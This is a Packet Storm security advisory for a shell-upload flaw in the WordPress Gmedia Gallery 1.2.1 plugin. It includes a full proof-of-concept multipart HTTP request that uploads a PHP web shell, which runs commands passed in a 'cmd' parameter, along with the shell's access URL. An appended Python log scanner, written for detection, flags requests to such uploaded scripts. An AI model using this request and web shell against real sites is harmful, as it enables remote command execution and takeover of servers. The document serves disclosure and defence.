WordPress Gmedia Gallery 1.2.1 Shell Upload

2014-08-03T00:00:00
ID PACKETSTORM:127725
Type packetstorm
Reporter Claudio Viviani
Modified 2014-08-03T00:00:00

Description

                                        
######################
# Exploit Title : WordPress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
  
# Exploit Author : Claudio Viviani  
  
# Vendor Homepage : http://www.codeasily.com/  
  
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip  
  
# Date : 2014-08-01  
  
# Tested on : Windows 7 / Mozilla Firefox  
  
######################  
  
# Description :   
  
Any user with access to the plugin's media upload (administrators only, by default) can upload PHP files.
  
######################  
  
# Vulnerability Disclosure Timeline:  
  
2014-08-01: Discovered vulnerability  
2014-08-01: Vendor Notification (Twitter)  
2014-08-01: Vendor Response/Feedback   
2014-08-02: Vendor Fix/Patch   
2014-08-02: Public Disclosure   
  
######################  
  
# PoC:  
  
POST  
Host=127.0.0.1  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding=gzip, deflate  
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia  
Content-Length=916  
Content-Type=multipart/form-data; boundary=---------------------------304431219031197  
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840  
Connection=keep-alive  
Pragma=no-cache  
Cache-Control=no-cache  
POSTDATA =-----------------------------304431219031197  
Content-Disposition: form-data; name="name"  
  
.shell.php  
-----------------------------304431219031197  
Content-Disposition: form-data; name="chunk"  
  
0  
-----------------------------304431219031197  
Content-Disposition: form-data; name="chunks"  
  
1  
-----------------------------304431219031197  
Content-Disposition: form-data; name="params"  
  
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=  
-----------------------------304431219031197  
Content-Disposition: form-data; name="file"; filename=".shell.php"  
Content-Type: application/octet-stream  
  
<?php  
  
if(isset($_REQUEST['cmd'])){  
echo "<pre>";  
$cmd = ($_REQUEST['cmd']);  
system($cmd);  
echo "</pre>";  
die;  
}  
  
?>  
  
  
  
-----------------------------304431219031197--  
  
  
Backdoor location:  
  
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd  
  
  
#####################  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
info@homelab.it  
homelabit@protonmail.ch  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
  
#####################  
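As an added detection example (not part of the original advisory or the plugin's code), the following Python script scans web server access log lines for requests that reach a script file under the plugin's upload tree, the location shown under "Backdoor location" above. The combined log format, the extension list, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload tree taken from the advisory's "Backdoor location" URL.
UPLOAD_TREE = "/wp-content/grand-media/"
# Assumption: extensions commonly mapped to the PHP handler; also hits x.php.jpg and x.php/info.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(?:$|[./])", re.IGNORECASE)
# Assumption: Apache/nginx "combined" access log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return a finding dict if the line requests a script in the upload tree, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # Decode twice so double-encoded paths (%252e -> %2e -> .) are normalised too.
    path = unquote(unquote(parts.path))
    idx = path.lower().find(UPLOAD_TREE)
    if idx == -1 or not SCRIPT_EXT.search(path[idx:]):
        return None
    name = path.rsplit("/", 1)[-1]
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "path": path,
        "hidden_file": name.startswith("."),    # dot-prefixed name, as in the PoC
        "has_query": bool(parts.query),         # parameters passed to an uploaded script
        "served": m["status"].startswith("2"),  # 2xx: the server returned content for the path
    }

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [03/Aug/2014:10:01:02 +0200] "GET /wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [03/Aug/2014:10:02:10 +0200] "GET /wordpress/wp-content/grand-media/image/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [03/Aug/2014:10:03:44 +0200] "GET /wordpress/wp-content/grand-media/application/x%2Ephtml HTTP/1.1" 404 210 "-" "curl/7.37"',
    '198.51.100.4 - - [03/Aug/2014:10:04:00 +0200] "GET /wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any finding with `served` set to true means a script file already exists in a directory that should hold only media, so the file itself should be collected and reviewed alongside the log entry.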